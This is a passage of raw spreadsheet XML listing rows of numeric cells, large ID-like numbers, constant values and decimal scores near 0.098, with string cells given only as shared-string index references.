        <v>1.7088168E7</v>
      </c>
      <c r="C7494" s="2" t="s">
        <v>7114</v>
      </c>
      <c r="D7494" s="2">
        <v>1.0</v>
      </c>
      <c r="E7494" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7494" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7495" ht="15.75" customHeight="1">
      <c r="A7495" s="1">
        <v>26622.0</v>
      </c>
      <c r="B7495" s="2">
        <v>1.8041194E7</v>
      </c>
      <c r="C7495" s="2" t="s">
        <v>7115</v>
      </c>
      <c r="D7495" s="2">
        <v>1.0</v>
      </c>
      <c r="E7495" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7495" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7496" ht="15.75" customHeight="1">
      <c r="A7496" s="1">
        <v>26733.0</v>
      </c>
      <c r="B7496" s="2">
        <v>1.8274131E7</v>
      </c>
      <c r="C7496" s="2" t="s">
        <v>7116</v>
      </c>
      <c r="D7496" s="2">
        <v>1.0</v>
      </c>
      <c r="E7496" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7496" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7497" ht="15.75" customHeight="1">
      <c r="A7497" s="1">
        <v>26757.0</v>
      </c>
      <c r="B7497" s="2">
        <v>1.8426001E7</v>
      </c>
      <c r="C7497" s="2" t="s">
        <v>7113</v>
      </c>
      <c r="D7497" s="2">
        <v>1.0</v>
      </c>
      <c r="E7497" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7497" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7498" ht="15.75" customHeight="1">
      <c r="A7498" s="1">
        <v>26897.0</v>
      </c>
      <c r="B7498" s="2">
        <v>1.9283007E7</v>
      </c>
      <c r="C7498" s="2" t="s">
        <v>7117</v>
      </c>
      <c r="D7498" s="2">
        <v>1.0</v>
      </c>
      <c r="E7498" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7498" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7499" ht="15.75" customHeight="1">
      <c r="A7499" s="1">
        <v>27040.0</v>
      </c>
      <c r="B7499" s="2">
        <v>2.0170252E7</v>
      </c>
      <c r="C7499" s="2" t="s">
        <v>7118</v>
      </c>
      <c r="D7499" s="2">
        <v>1.0</v>
      </c>
      <c r="E7499" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7499" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7500" ht="15.75" customHeight="1">
      <c r="A7500" s="1">
        <v>27077.0</v>
      </c>
      <c r="B7500" s="2">
        <v>2.0456822E7</v>
      </c>
      <c r="C7500" s="2" t="s">
        <v>7119</v>
      </c>
      <c r="D7500" s="2">
        <v>1.0</v>
      </c>
      <c r="E7500" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7500" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7501" ht="15.75" customHeight="1">
      <c r="A7501" s="1">
        <v>27122.0</v>
      </c>
      <c r="B7501" s="2">
        <v>2.071688E7</v>
      </c>
      <c r="C7501" s="2" t="s">
        <v>7083</v>
      </c>
      <c r="D7501" s="2">
        <v>1.0</v>
      </c>
      <c r="E7501" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7501" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7502" ht="15.75" customHeight="1">
      <c r="A7502" s="1">
        <v>27175.0</v>
      </c>
      <c r="B7502" s="2">
        <v>2.0865714E7</v>
      </c>
      <c r="C7502" s="2" t="s">
        <v>7084</v>
      </c>
      <c r="D7502" s="2">
        <v>1.0</v>
      </c>
      <c r="E7502" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7502" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7503" ht="15.75" customHeight="1">
      <c r="A7503" s="1">
        <v>27200.0</v>
      </c>
      <c r="B7503" s="2">
        <v>2.0935943E7</v>
      </c>
      <c r="C7503" s="2" t="s">
        <v>7120</v>
      </c>
      <c r="D7503" s="2">
        <v>1.0</v>
      </c>
      <c r="E7503" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7503" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7504" ht="15.75" customHeight="1">
      <c r="A7504" s="1">
        <v>27479.0</v>
      </c>
      <c r="B7504" s="2">
        <v>2.2019427E7</v>
      </c>
      <c r="C7504" s="2" t="s">
        <v>7121</v>
      </c>
      <c r="D7504" s="2">
        <v>1.0</v>
      </c>
      <c r="E7504" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7504" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7505" ht="15.75" customHeight="1">
      <c r="A7505" s="1">
        <v>28097.0</v>
      </c>
      <c r="B7505" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C7505" s="2" t="s">
        <v>7122</v>
      </c>
      <c r="D7505" s="2">
        <v>1.0</v>
      </c>
      <c r="E7505" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7505" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7506" ht="15.75" customHeight="1">
      <c r="A7506" s="1">
        <v>28237.0</v>
      </c>
      <c r="B7506" s="2">
        <v>2.5206465E7</v>
      </c>
      <c r="C7506" s="2" t="s">
        <v>7123</v>
      </c>
      <c r="D7506" s="2">
        <v>1.0</v>
      </c>
      <c r="E7506" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7506" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7507" ht="15.75" customHeight="1">
      <c r="A7507" s="1">
        <v>28294.0</v>
      </c>
      <c r="B7507" s="2">
        <v>2.5584617E7</v>
      </c>
      <c r="C7507" s="2" t="s">
        <v>7124</v>
      </c>
      <c r="D7507" s="2">
        <v>1.0</v>
      </c>
      <c r="E7507" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7507" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7508" ht="15.75" customHeight="1">
      <c r="A7508" s="1">
        <v>28964.0</v>
      </c>
      <c r="B7508" s="2">
        <v>2.9811661E7</v>
      </c>
      <c r="C7508" s="2" t="s">
        <v>7125</v>
      </c>
      <c r="D7508" s="2">
        <v>1.0</v>
      </c>
      <c r="E7508" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7508" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7509" ht="15.75" customHeight="1">
      <c r="A7509" s="1">
        <v>28980.0</v>
      </c>
      <c r="B7509" s="2">
        <v>2.982126E7</v>
      </c>
      <c r="C7509" s="2" t="s">
        <v>7126</v>
      </c>
      <c r="D7509" s="2">
        <v>1.0</v>
      </c>
      <c r="E7509" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7509" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7510" ht="15.75" customHeight="1">
      <c r="A7510" s="1">
        <v>29437.0</v>
      </c>
      <c r="B7510" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C7510" s="2" t="s">
        <v>7127</v>
      </c>
      <c r="D7510" s="2">
        <v>1.0</v>
      </c>
      <c r="E7510" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7510" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7511" ht="15.75" customHeight="1">
      <c r="A7511" s="1">
        <v>29707.0</v>
      </c>
      <c r="B7511" s="2">
        <v>3.4377877E7</v>
      </c>
      <c r="C7511" s="2" t="s">
        <v>7128</v>
      </c>
      <c r="D7511" s="2">
        <v>1.0</v>
      </c>
      <c r="E7511" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7511" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7512" ht="15.75" customHeight="1">
      <c r="A7512" s="1">
        <v>30070.0</v>
      </c>
      <c r="B7512" s="2">
        <v>3625217.0</v>
      </c>
      <c r="C7512" s="2" t="s">
        <v>7129</v>
      </c>
      <c r="D7512" s="2">
        <v>1.0</v>
      </c>
      <c r="E7512" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7512" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7513" ht="15.75" customHeight="1">
      <c r="A7513" s="1">
        <v>30222.0</v>
      </c>
      <c r="B7513" s="2">
        <v>3.740005E7</v>
      </c>
      <c r="C7513" s="2" t="s">
        <v>7130</v>
      </c>
      <c r="D7513" s="2">
        <v>1.0</v>
      </c>
      <c r="E7513" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7513" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7514" ht="15.75" customHeight="1">
      <c r="A7514" s="1">
        <v>30308.0</v>
      </c>
      <c r="B7514" s="2">
        <v>3.7941894E7</v>
      </c>
      <c r="C7514" s="2" t="s">
        <v>7131</v>
      </c>
      <c r="D7514" s="2">
        <v>1.0</v>
      </c>
      <c r="E7514" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7514" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7515" ht="15.75" customHeight="1">
      <c r="A7515" s="1">
        <v>30309.0</v>
      </c>
      <c r="B7515" s="2">
        <v>3.7941894E7</v>
      </c>
      <c r="C7515" s="2" t="s">
        <v>7132</v>
      </c>
      <c r="D7515" s="2">
        <v>1.0</v>
      </c>
      <c r="E7515" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7515" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7516" ht="15.75" customHeight="1">
      <c r="A7516" s="1">
        <v>30488.0</v>
      </c>
      <c r="B7516" s="2">
        <v>3.9907584E7</v>
      </c>
      <c r="C7516" s="2" t="s">
        <v>7133</v>
      </c>
      <c r="D7516" s="2">
        <v>1.0</v>
      </c>
      <c r="E7516" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7516" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7517" ht="15.75" customHeight="1">
      <c r="A7517" s="1">
        <v>30522.0</v>
      </c>
      <c r="B7517" s="2">
        <v>4019843.0</v>
      </c>
      <c r="C7517" s="2" t="s">
        <v>7134</v>
      </c>
      <c r="D7517" s="2">
        <v>1.0</v>
      </c>
      <c r="E7517" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7517" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7518" ht="15.75" customHeight="1">
      <c r="A7518" s="1">
        <v>30562.0</v>
      </c>
      <c r="B7518" s="2">
        <v>4083815.0</v>
      </c>
      <c r="C7518" s="2" t="s">
        <v>7135</v>
      </c>
      <c r="D7518" s="2">
        <v>1.0</v>
      </c>
      <c r="E7518" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7518" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7519" ht="15.75" customHeight="1">
      <c r="A7519" s="1">
        <v>31003.0</v>
      </c>
      <c r="B7519" s="2">
        <v>4.7661833E7</v>
      </c>
      <c r="C7519" s="2" t="s">
        <v>7090</v>
      </c>
      <c r="D7519" s="2">
        <v>1.0</v>
      </c>
      <c r="E7519" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7519" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7520" ht="15.75" customHeight="1">
      <c r="A7520" s="1">
        <v>31453.0</v>
      </c>
      <c r="B7520" s="2">
        <v>5033401.0</v>
      </c>
      <c r="C7520" s="2" t="s">
        <v>7136</v>
      </c>
      <c r="D7520" s="2">
        <v>1.0</v>
      </c>
      <c r="E7520" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7520" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7521" ht="15.75" customHeight="1">
      <c r="A7521" s="1">
        <v>31665.0</v>
      </c>
      <c r="B7521" s="2">
        <v>5.1755636E7</v>
      </c>
      <c r="C7521" s="2" t="s">
        <v>7137</v>
      </c>
      <c r="D7521" s="2">
        <v>1.0</v>
      </c>
      <c r="E7521" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7521" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7522" ht="15.75" customHeight="1">
      <c r="A7522" s="1">
        <v>32215.0</v>
      </c>
      <c r="B7522" s="2">
        <v>5.4884109E7</v>
      </c>
      <c r="C7522" s="2" t="s">
        <v>7138</v>
      </c>
      <c r="D7522" s="2">
        <v>1.0</v>
      </c>
      <c r="E7522" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7522" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7523" ht="15.75" customHeight="1">
      <c r="A7523" s="1">
        <v>32331.0</v>
      </c>
      <c r="B7523" s="2">
        <v>5.5822957E7</v>
      </c>
      <c r="C7523" s="2" t="s">
        <v>7139</v>
      </c>
      <c r="D7523" s="2">
        <v>1.0</v>
      </c>
      <c r="E7523" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7523" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7524" ht="15.75" customHeight="1">
      <c r="A7524" s="1">
        <v>32419.0</v>
      </c>
      <c r="B7524" s="2">
        <v>5.6425744E7</v>
      </c>
      <c r="C7524" s="2" t="s">
        <v>7096</v>
      </c>
      <c r="D7524" s="2">
        <v>1.0</v>
      </c>
      <c r="E7524" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7524" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7525" ht="15.75" customHeight="1">
      <c r="A7525" s="1">
        <v>32494.0</v>
      </c>
      <c r="B7525" s="2">
        <v>5704552.0</v>
      </c>
      <c r="C7525" s="2" t="s">
        <v>7140</v>
      </c>
      <c r="D7525" s="2">
        <v>1.0</v>
      </c>
      <c r="E7525" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7525" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7526" ht="15.75" customHeight="1">
      <c r="A7526" s="1">
        <v>32563.0</v>
      </c>
      <c r="B7526" s="2">
        <v>5769083.0</v>
      </c>
      <c r="C7526" s="2" t="s">
        <v>7141</v>
      </c>
      <c r="D7526" s="2">
        <v>1.0</v>
      </c>
      <c r="E7526" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7526" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7527" ht="15.75" customHeight="1">
      <c r="A7527" s="1">
        <v>32580.0</v>
      </c>
      <c r="B7527" s="2">
        <v>5783549.0</v>
      </c>
      <c r="C7527" s="2" t="s">
        <v>7142</v>
      </c>
      <c r="D7527" s="2">
        <v>1.0</v>
      </c>
      <c r="E7527" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7527" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7528" ht="15.75" customHeight="1">
      <c r="A7528" s="1">
        <v>32794.0</v>
      </c>
      <c r="B7528" s="2">
        <v>6146682.0</v>
      </c>
      <c r="C7528" s="2" t="s">
        <v>7097</v>
      </c>
      <c r="D7528" s="2">
        <v>1.0</v>
      </c>
      <c r="E7528" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7528" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7529" ht="15.75" customHeight="1">
      <c r="A7529" s="1">
        <v>32967.0</v>
      </c>
      <c r="B7529" s="2">
        <v>6550675.0</v>
      </c>
      <c r="C7529" s="2" t="s">
        <v>7143</v>
      </c>
      <c r="D7529" s="2">
        <v>1.0</v>
      </c>
      <c r="E7529" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7529" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7530" ht="15.75" customHeight="1">
      <c r="A7530" s="1">
        <v>33131.0</v>
      </c>
      <c r="B7530" s="2">
        <v>7051213.0</v>
      </c>
      <c r="C7530" s="2" t="s">
        <v>7144</v>
      </c>
      <c r="D7530" s="2">
        <v>1.0</v>
      </c>
      <c r="E7530" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7530" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7531" ht="15.75" customHeight="1">
      <c r="A7531" s="1">
        <v>33360.0</v>
      </c>
      <c r="B7531" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C7531" s="2" t="s">
        <v>7099</v>
      </c>
      <c r="D7531" s="2">
        <v>1.0</v>
      </c>
      <c r="E7531" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7531" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7532" ht="15.75" customHeight="1">
      <c r="A7532" s="1">
        <v>33363.0</v>
      </c>
      <c r="B7532" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C7532" s="2" t="s">
        <v>7145</v>
      </c>
      <c r="D7532" s="2">
        <v>1.0</v>
      </c>
      <c r="E7532" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7532" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7533" ht="15.75" customHeight="1">
      <c r="A7533" s="1">
        <v>33375.0</v>
      </c>
      <c r="B7533" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C7533" s="2" t="s">
        <v>7146</v>
      </c>
      <c r="D7533" s="2">
        <v>1.0</v>
      </c>
      <c r="E7533" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7533" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7534" ht="15.75" customHeight="1">
      <c r="A7534" s="1">
        <v>33826.0</v>
      </c>
      <c r="B7534" s="2">
        <v>8924083.0</v>
      </c>
      <c r="C7534" s="2" t="s">
        <v>7147</v>
      </c>
      <c r="D7534" s="2">
        <v>1.0</v>
      </c>
      <c r="E7534" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7534" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7535" ht="15.75" customHeight="1">
      <c r="A7535" s="1">
        <v>33838.0</v>
      </c>
      <c r="B7535" s="2">
        <v>9002794.0</v>
      </c>
      <c r="C7535" s="2" t="s">
        <v>7148</v>
      </c>
      <c r="D7535" s="2">
        <v>1.0</v>
      </c>
      <c r="E7535" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7535" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7536" ht="15.75" customHeight="1">
      <c r="A7536" s="1">
        <v>33964.0</v>
      </c>
      <c r="B7536" s="2">
        <v>9349660.0</v>
      </c>
      <c r="C7536" s="2" t="s">
        <v>7149</v>
      </c>
      <c r="D7536" s="2">
        <v>1.0</v>
      </c>
      <c r="E7536" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7536" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7537" ht="15.75" customHeight="1">
      <c r="A7537" s="1">
        <v>34220.0</v>
      </c>
      <c r="B7537" s="2">
        <v>4.0473927E7</v>
      </c>
      <c r="C7537" s="2" t="s">
        <v>7150</v>
      </c>
      <c r="D7537" s="2">
        <v>1.0</v>
      </c>
      <c r="E7537" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7537" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7538" ht="15.75" customHeight="1">
      <c r="A7538" s="1">
        <v>34233.0</v>
      </c>
      <c r="B7538" s="2">
        <v>4729822.0</v>
      </c>
      <c r="C7538" s="2" t="s">
        <v>7151</v>
      </c>
      <c r="D7538" s="2">
        <v>1.0</v>
      </c>
      <c r="E7538" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7538" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7539" ht="15.75" customHeight="1">
      <c r="A7539" s="1">
        <v>11816.0</v>
      </c>
      <c r="B7539" s="2">
        <v>2.4557981E7</v>
      </c>
      <c r="C7539" s="2" t="s">
        <v>7152</v>
      </c>
      <c r="D7539" s="2">
        <v>1.0</v>
      </c>
      <c r="E7539" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7539" s="2">
        <v>0.09927140255009106</v>
      </c>
    </row>
    <row r="7540" ht="15.75" customHeight="1">
      <c r="A7540" s="1">
        <v>1965.0</v>
      </c>
      <c r="B7540" s="2">
        <v>3.0331335E7</v>
      </c>
      <c r="C7540" s="2" t="s">
        <v>7153</v>
      </c>
      <c r="D7540" s="2">
        <v>1.0</v>
      </c>
      <c r="E7540" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7540" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="7541" ht="15.75" customHeight="1">
      <c r="A7541" s="1">
        <v>3042.0</v>
      </c>
      <c r="B7541" s="2">
        <v>3.648619E7</v>
      </c>
      <c r="C7541" s="2" t="s">
        <v>7154</v>
      </c>
      <c r="D7541" s="2">
        <v>1.0</v>
      </c>
      <c r="E7541" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7541" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="7542" ht="15.75" customHeight="1">
      <c r="A7542" s="1">
        <v>3753.0</v>
      </c>
      <c r="B7542" s="2">
        <v>3.9726703E7</v>
      </c>
      <c r="C7542" s="2" t="s">
        <v>7155</v>
      </c>
      <c r="D7542" s="2">
        <v>1.0</v>
      </c>
      <c r="E7542" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7542" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="7543" ht="15.75" customHeight="1">
      <c r="A7543" s="1">
        <v>7522.0</v>
      </c>
      <c r="B7543" s="2">
        <v>5.1411015E7</v>
      </c>
      <c r="C7543" s="2" t="s">
        <v>7156</v>
      </c>
      <c r="D7543" s="2">
        <v>1.0</v>
      </c>
      <c r="E7543" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7543" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="7544" ht="15.75" customHeight="1">
      <c r="A7544" s="1">
        <v>13059.0</v>
      </c>
      <c r="B7544" s="2">
        <v>3.3233185E7</v>
      </c>
      <c r="C7544" s="2" t="s">
        <v>7157</v>
      </c>
      <c r="D7544" s="2">
        <v>1.0</v>
      </c>
      <c r="E7544" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7544" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="7545" ht="15.75" customHeight="1">
      <c r="A7545" s="1">
        <v>17434.0</v>
      </c>
      <c r="B7545" s="2">
        <v>4.9737928E7</v>
      </c>
      <c r="C7545" s="2" t="s">
        <v>7158</v>
      </c>
      <c r="D7545" s="2">
        <v>1.0</v>
      </c>
      <c r="E7545" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7545" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="7546" ht="15.75" customHeight="1">
      <c r="A7546" s="1">
        <v>18549.0</v>
      </c>
      <c r="B7546" s="2">
        <v>5.3138943E7</v>
      </c>
      <c r="C7546" s="2" t="s">
        <v>7159</v>
      </c>
      <c r="D7546" s="2">
        <v>1.0</v>
      </c>
      <c r="E7546" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7546" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="7547" ht="15.75" customHeight="1">
      <c r="A7547" s="1">
        <v>21777.0</v>
      </c>
      <c r="B7547" s="2">
        <v>2.6437752E7</v>
      </c>
      <c r="C7547" s="2" t="s">
        <v>7160</v>
      </c>
      <c r="D7547" s="2">
        <v>1.0</v>
      </c>
      <c r="E7547" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7547" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="7548" ht="15.75" customHeight="1">
      <c r="A7548" s="1">
        <v>21835.0</v>
      </c>
      <c r="B7548" s="2">
        <v>2.7084369E7</v>
      </c>
      <c r="C7548" s="2" t="s">
        <v>7161</v>
      </c>
      <c r="D7548" s="2">
        <v>1.0</v>
      </c>
      <c r="E7548" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7548" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="7549" ht="15.75" customHeight="1">
      <c r="A7549" s="1">
        <v>14375.0</v>
      </c>
      <c r="B7549" s="2">
        <v>3.8987033E7</v>
      </c>
      <c r="C7549" s="2" t="s">
        <v>7162</v>
      </c>
      <c r="D7549" s="2">
        <v>1.0</v>
      </c>
      <c r="E7549" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7549" s="2">
        <v>0.09844054580896686</v>
      </c>
    </row>
    <row r="7550" ht="15.75" customHeight="1">
      <c r="A7550" s="1">
        <v>28895.0</v>
      </c>
      <c r="B7550" s="2">
        <v>2.9283104E7</v>
      </c>
      <c r="C7550" s="2" t="s">
        <v>7163</v>
      </c>
      <c r="D7550" s="2">
        <v>1.0</v>
      </c>
      <c r="E7550" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7550" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="7551" ht="15.75" customHeight="1">
      <c r="A7551" s="1">
        <v>31118.0</v>
      </c>
      <c r="B7551" s="2">
        <v>4.8792538E7</v>
      </c>
      <c r="C7551" s="2" t="s">
        <v>7164</v>
      </c>
      <c r="D7551" s="2">
        <v>1.0</v>
      </c>
      <c r="E7551" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7551" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="7552" ht="15.75" customHeight="1">
      <c r="A7552" s="1">
        <v>7820.0</v>
      </c>
      <c r="B7552" s="2">
        <v>5.2283907E7</v>
      </c>
      <c r="C7552" s="2" t="s">
        <v>7165</v>
      </c>
      <c r="D7552" s="2">
        <v>1.0</v>
      </c>
      <c r="E7552" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7552" s="2">
        <v>0.09797979797979797</v>
      </c>
    </row>
    <row r="7553" ht="15.75" customHeight="1">
      <c r="A7553" s="1">
        <v>25739.0</v>
      </c>
      <c r="B7553" s="2">
        <v>1.4594622E7</v>
      </c>
      <c r="C7553" s="2" t="s">
        <v>7166</v>
      </c>
      <c r="D7553" s="2">
        <v>1.0</v>
      </c>
      <c r="E7553" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7553" s="2">
        <v>0.09797979797979797</v>
      </c>
    </row>
    <row r="7554" ht="15.75" customHeight="1">
      <c r="A7554" s="1">
        <v>30805.0</v>
      </c>
      <c r="B7554" s="2">
        <v>4.5219883E7</v>
      </c>
      <c r="C7554" s="2" t="s">
        <v>7167</v>
      </c>
      <c r="D7554" s="2">
        <v>1.0</v>
      </c>
      <c r="E7554" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7554" s="2">
        <v>0.09797979797979797</v>
      </c>
    </row>
    <row r="7555" ht="15.75" customHeight="1">
      <c r="A7555" s="1">
        <v>22274.0</v>
      </c>
      <c r="B7555" s="2">
        <v>3.3196684E7</v>
      </c>
      <c r="C7555" s="2" t="s">
        <v>7168</v>
      </c>
      <c r="D7555" s="2">
        <v>1.0</v>
      </c>
      <c r="E7555" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7555" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="7556" ht="15.75" customHeight="1">
      <c r="A7556" s="1">
        <v>29034.0</v>
      </c>
      <c r="B7556" s="2">
        <v>3.0144842E7</v>
      </c>
      <c r="C7556" s="2" t="s">
        <v>7169</v>
      </c>
      <c r="D7556" s="2">
        <v>1.0</v>
      </c>
      <c r="E7556" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7556" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="7557" ht="15.75" customHeight="1">
      <c r="A7557" s="1">
        <v>11718.0</v>
      </c>
      <c r="B7557" s="2">
        <v>2.3768012E7</v>
      </c>
      <c r="C7557" s="2" t="s">
        <v>7170</v>
      </c>
      <c r="D7557" s="2">
        <v>1.0</v>
      </c>
      <c r="E7557" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7557" s="2">
        <v>0.09788359788359788</v>
      </c>
    </row>
    <row r="7558" ht="15.75" customHeight="1">
      <c r="A7558" s="1">
        <v>21015.0</v>
      </c>
      <c r="B7558" s="2">
        <v>1.7327791E7</v>
      </c>
      <c r="C7558" s="2" t="s">
        <v>7171</v>
      </c>
      <c r="D7558" s="2">
        <v>1.0</v>
      </c>
      <c r="E7558" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7558" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="7559" ht="15.75" customHeight="1">
      <c r="A7559" s="1">
        <v>23424.0</v>
      </c>
      <c r="B7559" s="2">
        <v>5642094.0</v>
      </c>
      <c r="C7559" s="2" t="s">
        <v>7172</v>
      </c>
      <c r="D7559" s="2">
        <v>1.0</v>
      </c>
      <c r="E7559" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7559" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="7560" ht="15.75" customHeight="1">
      <c r="A7560" s="1">
        <v>30604.0</v>
      </c>
      <c r="B7560" s="2">
        <v>4133664.0</v>
      </c>
      <c r="C7560" s="2" t="s">
        <v>7173</v>
      </c>
      <c r="D7560" s="2">
        <v>1.0</v>
      </c>
      <c r="E7560" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7560" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="7561" ht="15.75" customHeight="1">
      <c r="A7561" s="1">
        <v>33523.0</v>
      </c>
      <c r="B7561" s="2">
        <v>8112450.0</v>
      </c>
